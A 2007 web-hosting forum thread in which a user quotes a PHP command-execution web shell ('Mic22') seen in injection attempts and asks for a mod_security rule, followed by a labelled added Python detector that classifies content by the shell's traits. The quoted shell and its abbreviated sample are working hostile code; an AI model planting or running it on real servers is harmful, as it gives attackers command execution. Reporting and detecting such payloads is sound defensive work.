
Mic22 Attacks

Discussion in 'General Discussion' started by Solokron, Oct 30, 2007.

  1. Solokron

    I have been seeing a lot of script injection attempts with the following code.

    Code:
    <?php
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;

    Has anyone come up with a mod security rule specifically for these? Googling only showed a lot of foreign sites.
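
Added example, not part of the original post or thread: a Python check that classifies request or file content by the traits of the payload quoted above. It separates the "Mic22" banner from the more durable trait, several command-execution functions that are both probed with function_exists() and called with errors suppressed. The name `classify`, the verdict labels and the sample strings are assumptions constructed for illustration.

```python
import re

# Traits of the payload quoted in the post above.
MARKER = re.compile(r"""echo\s+["']Mic22["']""", re.I)
EXEC_FUNCS = r"(exec|shell_exec|system|passthru|popen)"
# function_exists('exec') style availability probes.
PROBE = re.compile(r"""function_exists\s*\(\s*["']""" + EXEC_FUNCS + r"""["']\s*\)""", re.I)
# Error-suppressed calls such as @exec( or @popen(.
CALL = re.compile(r"@\s*" + EXEC_FUNCS + r"\s*\(", re.I)

def classify(text):
    """Classify request or file content by the payload's traits."""
    probed = {f.lower() for f in PROBE.findall(text)}
    called = {f.lower() for f in CALL.findall(text)}
    marker = bool(MARKER.search(text))
    # Durable trait: at least two exec-style functions are both probed
    # with function_exists() and called with errors suppressed.
    chain = len(probed & called) >= 2
    if marker and chain:
        return "mic22-shell"
    if chain:
        return "exec-fallback-chain"
    return "marker-only" if marker else "clean"

# Constructed samples (not captured traffic). The first abbreviates the
# posted payload to two of its branches.
POSTED = """<?php echo "Mic22"; $cmd="id"; echo ex($cmd);
function ex($cfe){ $res='';
if(function_exists('exec')){ @exec($cfe,$res); $res=join("\\n",$res); }
elseif(function_exists('shell_exec')){ $res=@shell_exec($cfe); }
return $res; } exit;"""
# Same structure with the banner string changed.
RENAMED = POSTED.replace("Mic22", "hello")
# Benign feature check: one probe, no suppressed call.
BENIGN = "<?php if (function_exists('exec')) { $can_exec = true; }"
# Plain text that only mentions the banner.
MENTION = 'The script starts with echo "Mic22"; and then exits.'

if __name__ == "__main__":
    for name, body in [("posted", POSTED), ("renamed", RENAMED),
                       ("benign", BENIGN), ("mention", MENTION)]:
        print(f"{name:8} -> {classify(body)}")
```

A filter keyed only on the banner string misses the renamed sample and flags the plain-text mention, while the probe-and-call chain catches both payload variants and leaves the single benign feature check alone.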
     
  2. gizzmo2006

  3. Solokron

    Yes, I am already aware of that site, thank you.


     